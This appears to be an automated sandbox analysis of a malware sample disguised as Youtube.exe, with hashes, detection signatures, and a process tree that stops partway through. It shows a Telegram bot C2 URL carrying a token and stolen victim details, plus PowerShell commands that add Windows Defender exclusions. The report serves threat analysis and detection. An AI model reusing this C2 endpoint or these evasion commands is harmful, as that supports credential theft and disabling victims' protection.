Analysis

  • max time kernel
    1800s
  • max time network
    1801s
  • platform
    windows11-21h2_x64
  • resource
    win11-20240709-en
  • resource tags

    arch:x64arch:x86image:win11-20240709-enlocale:en-usos:windows11-21h2-x64system
  • submitted
    17-07-2024 13:10

General

  • Target

    Youtube.exe

  • Size

    8.7MB

  • MD5

    d25ebdfc04bdadea74017fa72f90781f

  • SHA1

    f7278c4d04fc4db888368e0245d7607d8bcbb557

  • SHA256

    9f30de67eacb0138506eff3c67dc9c52b0e923416dc75722ac90b12210b5383f

  • SHA512

    77cca4e741a6f96cc35a3ce55c3f899f902719c8ee29c84a6f5dcb57e9d6b8f85cad2042486ff907046f3c87673f5a34da73730256822d090ae764ba21064e71

  • SSDEEP

    196608:fE7JB0tYrXLW+d7UcIxptvyUQymRDSI1WCOK5m:fE9B0OjrdLK4J/Y

Malware Config

Extracted

Family

gurcu

C2

https://api.telegram.org/bot7121631902:AAErn17xNWrdiucOEwhQIj8v6o5tvdffJT4/sendPhoto?chat_id=7391062786&caption=%E2%9D%95%20User%20connected%20%E2%9D%95%0A%E2%80%A2%20ID%3A%204f1ca97b69752bcaadf13b0dd4a54c66c43cb077%0A%E2%80%A2%20Comment%3A%20br0ken%0A%0A%E2%80%A2%20User%20Name%3A%20Admin%0A%E2%80%A2%20PC%20Name%3A%20ELEOLWUJ%0A%E2%80%A2%20OS%20Info%3A%20Windows%2010%20Pro%0A%0A%E2%80%A2%20IP%3A%20194.110.13.70%0A%E2%80%A2%20GEO%3A%20GB%20%2F%20London%0A%0A%E2%80%A2%20Working%20Directory%3A%20C%3A%5CProgram%20Files%5CInternet%20Explorer%5CRegistry.ex

Signatures

  • DcRat 38 IoCs

    DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.

  • Gurcu, WhiteSnake

    Gurcu is a malware stealer written in C#.

  • Modifies WinLogon for persistence 2 TTPs 12 IoCs
  • Process spawned unexpected child process 36 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • DCRat payload 6 IoCs

    Detects payload of DCRat, commonly dropped by NSIS installers.

  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 1 IoCs
  • XMRig Miner payload 11 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 31 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Downloads MZ/PE file
  • .NET Reactor proctector 1 IoCs

    Detects an executable protected by an unregistered version of Eziriz's .NET Reactor.

  • Checks BIOS information in registry 2 TTPs 2 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Executes dropped EXE 64 IoCs
  • Loads dropped DLL 17 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Themida packer 2 IoCs

    Detects Themida, an advanced Windows software protection system.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 24 IoCs
  • Blocklisted process makes network request 2 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 1 IoCs
  • Enumerates connected drives 3 TTPs 23 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 10 IoCs
  • Looks up external IP address via web service 3 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 2 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 34 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Enumerates system info in registry 2 TTPs 6 IoCs
  • Modifies data under HKEY_USERS 3 IoCs
  • Modifies registry class 35 IoCs
  • NTFS ADS 1 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 37 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 3 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 64 IoCs
  • Suspicious use of SendNotifyMessage 12 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Users\Admin\AppData\Local\Temp\Youtube.exe
    "C:\Users\Admin\AppData\Local\Temp\Youtube.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:3440
    • C:\Users\Admin\AppData\Local\Temp\Result.exe
      "C:\Users\Admin\AppData\Local\Temp\Result.exe"
      2⤵
      • Executes dropped EXE
      • Suspicious use of WriteProcessMemory
      PID:4352
      • C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
        "C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"
        3⤵
        • Executes dropped EXE
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:4884
        • C:\Windows\SysWOW64\msiexec.exe
          "msiexec" /i "C:\Users\Admin\AppData\Local\Temp\node-v18.16.0-x64.msi" /qn
          4⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:276
        • C:\Users\Admin\AppData\Local\Temp\vc_redist.x64.exe
          "C:\Users\Admin\AppData\Local\Temp\vc_redist.x64.exe" /install /quiet /norestart
          4⤵
          • Executes dropped EXE
          PID:5808
          • C:\Windows\Temp\{364DCF21-CB4A-412B-A23B-C423CF6B2422}\.cr\vc_redist.x64.exe
            "C:\Windows\Temp\{364DCF21-CB4A-412B-A23B-C423CF6B2422}\.cr\vc_redist.x64.exe" -burn.clean.room="C:\Users\Admin\AppData\Local\Temp\vc_redist.x64.exe" -burn.filehandle.attached=564 -burn.filehandle.self=688 /install /quiet /norestart
            5⤵
            • Executes dropped EXE
            • Loads dropped DLL
            PID:3568
        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://github.com/pizzaboxer/bloxstrap/releases/download/v2.5.4/Bloxstrap-v2.5.4.exe
          4⤵
          • Enumerates system info in registry
          • NTFS ADS
          • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
          • Suspicious use of FindShellTrayWindow
          • Suspicious use of SendNotifyMessage
          PID:5676
          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x104,0x108,0x10c,0xe0,0x110,0x7ffe98b73cb8,0x7ffe98b73cc8,0x7ffe98b73cd8
            5⤵
              PID:5388
            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1728,5890545263886260941,13795001511502530143,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1860 /prefetch:2
              5⤵
                PID:2792
              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1728,5890545263886260941,13795001511502530143,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1920 /prefetch:3
                5⤵
                  PID:4312
                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1728,5890545263886260941,13795001511502530143,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2232 /prefetch:8
                  5⤵
                    PID:2800
                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1728,5890545263886260941,13795001511502530143,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3284 /prefetch:1
                    5⤵
                      PID:2232
                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1728,5890545263886260941,13795001511502530143,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3308 /prefetch:1
                      5⤵
                        PID:6068
                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1728,5890545263886260941,13795001511502530143,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5188 /prefetch:8
                        5⤵
                          PID:4016
                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1728,5890545263886260941,13795001511502530143,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5320 /prefetch:8
                          5⤵
                            PID:5256
                          • C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe
                            "C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1728,5890545263886260941,13795001511502530143,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5840 /prefetch:8
                            5⤵
                              PID:1912
                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1728,5890545263886260941,13795001511502530143,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --gpu-preferences=SAAAAAAAAADoAAAwAAAAAAAAAAAAAAAAAABgAAAQAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=5628 /prefetch:2
                              5⤵
                                PID:4380
                            • C:\Users\Admin\AppData\Local\Temp\Solara.Dir\cd57e4c171d6e8f5ea8b8f824a6a7316.exe
                              "C:\Users\Admin\AppData\Local\Temp\Solara.Dir\cd57e4c171d6e8f5ea8b8f824a6a7316.exe"
                              4⤵
                              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                              • Checks BIOS information in registry
                              • Executes dropped EXE
                              • Loads dropped DLL
                              • Checks whether UAC is enabled
                              • Suspicious use of NtSetInformationThreadHideFromDebugger
                              PID:3372
                              • C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe
                                "C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe" --embedded-browser-webview=1 --webview-exe-name=cd57e4c171d6e8f5ea8b8f824a6a7316.exe --webview-exe-version=1.0.0.0 --user-data-dir="C:\Users\Admin\AppData\Local\Temp\Solara.Dir\cd57e4c171d6e8f5ea8b8f824a6a7316.exe.WebView2\EBWebView" --no-default-browser-check --disable-component-extensions-with-background-pages --no-first-run --disable-default-apps --noerrdialogs --embedded-browser-webview-dpi-awareness=1 --disable-popup-blocking --internet-explorer-integration=none --js-flags="--harmony-weak-refs-with-cleanup-some --expose-gc" --mojo-named-platform-channel-pipe=3372.1692.6477468741360226681
                                5⤵
                                • Enumerates system info in registry
                                • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
                                PID:5772
                                • C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe
                                  "C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe" --type=crashpad-handler --user-data-dir=C:\Users\Admin\AppData\Local\Temp\Solara.Dir\cd57e4c171d6e8f5ea8b8f824a6a7316.exe.WebView2\EBWebView /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Users\Admin\AppData\Local\Temp\Solara.Dir\cd57e4c171d6e8f5ea8b8f824a6a7316.exe.WebView2\EBWebView\Crashpad --metrics-dir=C:\Users\Admin\AppData\Local\Temp\Solara.Dir\cd57e4c171d6e8f5ea8b8f824a6a7316.exe.WebView2\EBWebView --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe" --annotation=plat=Win64 "--annotation=prod=Edge WebView2" --annotation=ver=90.0.818.66 --initial-client-data=0x104,0x108,0x10c,0xe0,0x1fc,0x7ffe98b73cb8,0x7ffe98b73cc8,0x7ffe98b73cd8
                                  6⤵
                                    PID:5644
                                  • C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe
                                    "C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe" --type=gpu-process --field-trial-handle=1944,14418166984334420509,12288332412312571531,131072 --enable-features=ForwardMemoryPressureEventsToGpuProcess,UseSwapChainsInSoftware --disable-features=FilterAdsOnAbusiveSites,SpareRendererForSitePerProcess,WebPayments,msApplicationGuard,msAutomaticTabFreeze,msBrowserSettingsSupported,msEdgeFaviconService,msEdgeLinkDoctor,msEdgeMGPFrev1,msEdgeOnRampFRE,msEdgeOnRampImport,msEdgeReadingView,msEdgeSettingsImport,msEdgeSettingsImportV2,msEdgeShoppingUI,msEdgeTranslate,msEdgeUseCaptivePortalService,msImplicitSignin,msPasswordBreachDetection,msReadAloud,msRevokeExtensions,msSendClientDataHeader,msSendClientDataHeaderToEdgeServices,msSyncEdgeCollections,msUseLabelingService,msWebAssistHistorySearch --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Temp\Solara.Dir\cd57e4c171d6e8f5ea8b8f824a6a7316.exe.WebView2\EBWebView" --webview-exe-name=cd57e4c171d6e8f5ea8b8f824a6a7316.exe --webview-exe-version=1.0.0.0 --embedded-browser-webview=1 --embedded-browser-webview-dpi-awareness=1 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1956 /prefetch:2
                                    6⤵
                                      PID:4060
                                    • C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe
                                      "C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1944,14418166984334420509,12288332412312571531,131072 --enable-features=ForwardMemoryPressureEventsToGpuProcess,UseSwapChainsInSoftware --disable-features=FilterAdsOnAbusiveSites,SpareRendererForSitePerProcess,WebPayments,msApplicationGuard,msAutomaticTabFreeze,msBrowserSettingsSupported,msEdgeFaviconService,msEdgeLinkDoctor,msEdgeMGPFrev1,msEdgeOnRampFRE,msEdgeOnRampImport,msEdgeReadingView,msEdgeSettingsImport,msEdgeSettingsImportV2,msEdgeShoppingUI,msEdgeTranslate,msEdgeUseCaptivePortalService,msImplicitSignin,msPasswordBreachDetection,msReadAloud,msRevokeExtensions,msSendClientDataHeader,msSendClientDataHeaderToEdgeServices,msSyncEdgeCollections,msUseLabelingService,msWebAssistHistorySearch --lang=en-US --service-sandbox-type=none --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Temp\Solara.Dir\cd57e4c171d6e8f5ea8b8f824a6a7316.exe.WebView2\EBWebView" --webview-exe-name=cd57e4c171d6e8f5ea8b8f824a6a7316.exe --webview-exe-version=1.0.0.0 --embedded-browser-webview=1 --embedded-browser-webview-dpi-awareness=1 --mojo-platform-channel-handle=2004 /prefetch:3
                                      6⤵
                                        PID:2500
                                      • C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe
                                        "C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1944,14418166984334420509,12288332412312571531,131072 --enable-features=ForwardMemoryPressureEventsToGpuProcess,UseSwapChainsInSoftware --disable-features=FilterAdsOnAbusiveSites,SpareRendererForSitePerProcess,WebPayments,msApplicationGuard,msAutomaticTabFreeze,msBrowserSettingsSupported,msEdgeFaviconService,msEdgeLinkDoctor,msEdgeMGPFrev1,msEdgeOnRampFRE,msEdgeOnRampImport,msEdgeReadingView,msEdgeSettingsImport,msEdgeSettingsImportV2,msEdgeShoppingUI,msEdgeTranslate,msEdgeUseCaptivePortalService,msImplicitSignin,msPasswordBreachDetection,msReadAloud,msRevokeExtensions,msSendClientDataHeader,msSendClientDataHeaderToEdgeServices,msSyncEdgeCollections,msUseLabelingService,msWebAssistHistorySearch --lang=en-US --service-sandbox-type=utility --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Temp\Solara.Dir\cd57e4c171d6e8f5ea8b8f824a6a7316.exe.WebView2\EBWebView" --webview-exe-name=cd57e4c171d6e8f5ea8b8f824a6a7316.exe --webview-exe-version=1.0.0.0 --embedded-browser-webview=1 --embedded-browser-webview-dpi-awareness=1 --mojo-platform-channel-handle=2420 /prefetch:8
                                        6⤵
                                          PID:4148
                                        • C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe
                                          "C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe" --type=renderer --js-flags="--harmony-weak-refs-with-cleanup-some --expose-gc" --field-trial-handle=1944,14418166984334420509,12288332412312571531,131072 --enable-features=ForwardMemoryPressureEventsToGpuProcess,UseSwapChainsInSoftware --disable-features=FilterAdsOnAbusiveSites,SpareRendererForSitePerProcess,WebPayments,msApplicationGuard,msAutomaticTabFreeze,msBrowserSettingsSupported,msEdgeFaviconService,msEdgeLinkDoctor,msEdgeMGPFrev1,msEdgeOnRampFRE,msEdgeOnRampImport,msEdgeReadingView,msEdgeSettingsImport,msEdgeSettingsImportV2,msEdgeShoppingUI,msEdgeTranslate,msEdgeUseCaptivePortalService,msImplicitSignin,msPasswordBreachDetection,msReadAloud,msRevokeExtensions,msSendClientDataHeader,msSendClientDataHeaderToEdgeServices,msSyncEdgeCollections,msUseLabelingService,msWebAssistHistorySearch --lang=en-US --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Temp\Solara.Dir\cd57e4c171d6e8f5ea8b8f824a6a7316.exe.WebView2\EBWebView" --webview-exe-name=cd57e4c171d6e8f5ea8b8f824a6a7316.exe --webview-exe-version=1.0.0.0 --embedded-browser-webview=1 --embedded-browser-webview-dpi-awareness=1 --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2960 /prefetch:1
                                          6⤵
                                            PID:1848
                                          • C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe
                                            "C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1944,14418166984334420509,12288332412312571531,131072 --enable-features=ForwardMemoryPressureEventsToGpuProcess,UseSwapChainsInSoftware --disable-features=FilterAdsOnAbusiveSites,SpareRendererForSitePerProcess,WebPayments,msApplicationGuard,msAutomaticTabFreeze,msBrowserSettingsSupported,msEdgeFaviconService,msEdgeLinkDoctor,msEdgeMGPFrev1,msEdgeOnRampFRE,msEdgeOnRampImport,msEdgeReadingView,msEdgeSettingsImport,msEdgeSettingsImportV2,msEdgeShoppingUI,msEdgeTranslate,msEdgeUseCaptivePortalService,msImplicitSignin,msPasswordBreachDetection,msReadAloud,msRevokeExtensions,msSendClientDataHeader,msSendClientDataHeaderToEdgeServices,msSyncEdgeCollections,msUseLabelingService,msWebAssistHistorySearch --lang=en-US --service-sandbox-type=none --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Temp\Solara.Dir\cd57e4c171d6e8f5ea8b8f824a6a7316.exe.WebView2\EBWebView" --webview-exe-name=cd57e4c171d6e8f5ea8b8f824a6a7316.exe --webview-exe-version=1.0.0.0 --embedded-browser-webview=1 --embedded-browser-webview-dpi-awareness=1 --mojo-platform-channel-handle=4800 /prefetch:8
                                            6⤵
                                              PID:3376
                                            • C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe
                                              "C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe" --type=gpu-process --field-trial-handle=1944,14418166984334420509,12288332412312571531,131072 --enable-features=ForwardMemoryPressureEventsToGpuProcess,UseSwapChainsInSoftware --disable-features=FilterAdsOnAbusiveSites,SpareRendererForSitePerProcess,WebPayments,msApplicationGuard,msAutomaticTabFreeze,msBrowserSettingsSupported,msEdgeFaviconService,msEdgeLinkDoctor,msEdgeMGPFrev1,msEdgeOnRampFRE,msEdgeOnRampImport,msEdgeReadingView,msEdgeSettingsImport,msEdgeSettingsImportV2,msEdgeShoppingUI,msEdgeTranslate,msEdgeUseCaptivePortalService,msImplicitSignin,msPasswordBreachDetection,msReadAloud,msRevokeExtensions,msSendClientDataHeader,msSendClientDataHeaderToEdgeServices,msSyncEdgeCollections,msUseLabelingService,msWebAssistHistorySearch --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Temp\Solara.Dir\cd57e4c171d6e8f5ea8b8f824a6a7316.exe.WebView2\EBWebView" --webview-exe-name=cd57e4c171d6e8f5ea8b8f824a6a7316.exe --webview-exe-version=1.0.0.0 --embedded-browser-webview=1 --embedded-browser-webview-dpi-awareness=1 --gpu-preferences=SAAAAAAAAADoAAAwAAAAAAAAAAAAAAAAAABgAAAQAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=4832 /prefetch:2
                                              6⤵
                                                PID:1784
                                        • C:\Users\Admin\AppData\Local\Temp\solara.exe
                                          "C:\Users\Admin\AppData\Local\Temp\solara.exe"
                                          3⤵
                                          • Executes dropped EXE
                                          • Modifies registry class
                                          • Suspicious use of WriteProcessMemory
                                          PID:2680
                                          • C:\Windows\SysWOW64\WScript.exe
                                            "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\aImCrmZyeD77A2ANdrk.vbe"
                                            4⤵
                                            • Suspicious use of WriteProcessMemory
                                            PID:2948
                                            • C:\Windows\SysWOW64\cmd.exe
                                              C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\4F0VCIGGZPxdNa.bat" "
                                              5⤵
                                              • Suspicious use of WriteProcessMemory
                                              PID:4192
                                              • C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe
                                                "C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe"
                                                6⤵
                                                • Modifies WinLogon for persistence
                                                • Executes dropped EXE
                                                • Adds Run key to start application
                                                • Drops file in Program Files directory
                                                • Drops file in Windows directory
                                                • Suspicious behavior: EnumeratesProcesses
                                                • Suspicious use of AdjustPrivilegeToken
                                                • Suspicious use of WriteProcessMemory
                                                PID:2944
                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe'
                                                  7⤵
                                                  • Command and Scripting Interpreter: PowerShell
                                                  • Suspicious behavior: EnumeratesProcesses
                                                  • Suspicious use of AdjustPrivilegeToken
                                                  PID:1880
                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  "powershell" -Command Add-MpPreference -ExclusionPath 'C:\winNet\winlogon.exe'
                                                  7⤵
                                                  • Command and Scripting Interpreter: PowerShell
                                                  • Suspicious behavior: EnumeratesProcesses
                                                  • Suspicious use of AdjustPrivilegeToken
                                                  PID:1260
                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Default\SendTo\sppsvc.exe'
                                                  7⤵
                                                  • Command and Scripting Interpreter: PowerShell
                                                  • Suspicious behavior: EnumeratesProcesses
                                                  • Suspicious use of AdjustPrivilegeToken
                                                  PID:5072
                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Internet Explorer\Registry.exe'
                                                  7⤵
                                                  • Command and Scripting Interpreter: PowerShell
                                                  • Suspicious behavior: EnumeratesProcesses
                                                  • Suspicious use of AdjustPrivilegeToken
                                                  PID:2588
                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\Microsoft.NET\RedistList\wscript.exe'
                                                  7⤵
                                                  • Command and Scripting Interpreter: PowerShell
                                                  • Suspicious behavior: EnumeratesProcesses
                                                  • Suspicious use of AdjustPrivilegeToken
                                                  PID:5016
                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  "powershell" -Command Add-MpPreference -ExclusionPath 'C:\winNet\explorer.exe'
                                                  7⤵
                                                  • Command and Scripting Interpreter: PowerShell
                                                  • Suspicious behavior: EnumeratesProcesses
                                                  • Suspicious use of AdjustPrivilegeToken
                                                  PID:1528
                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\IdentityCRL\INT\backgroundTaskHost.exe'
                                                  7⤵
                                                  • Command and Scripting Interpreter: PowerShell
                                                  • Suspicious behavior: EnumeratesProcesses
                                                  • Suspicious use of AdjustPrivilegeToken
                                                  PID:2232
                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Java\jdk-1.8\include\win32\bridge\System.exe'
                                                  7⤵
                                                  • Command and Scripting Interpreter: PowerShell
                                                  • Suspicious behavior: EnumeratesProcesses
                                                  • Suspicious use of AdjustPrivilegeToken
                                                  PID:4504
                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows NT\TableTextService\en-US\dllhost.exe'
                                                  7⤵
                                                  • Command and Scripting Interpreter: PowerShell
                                                  • Suspicious behavior: EnumeratesProcesses
                                                  • Suspicious use of AdjustPrivilegeToken
                                                  PID:4860
                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
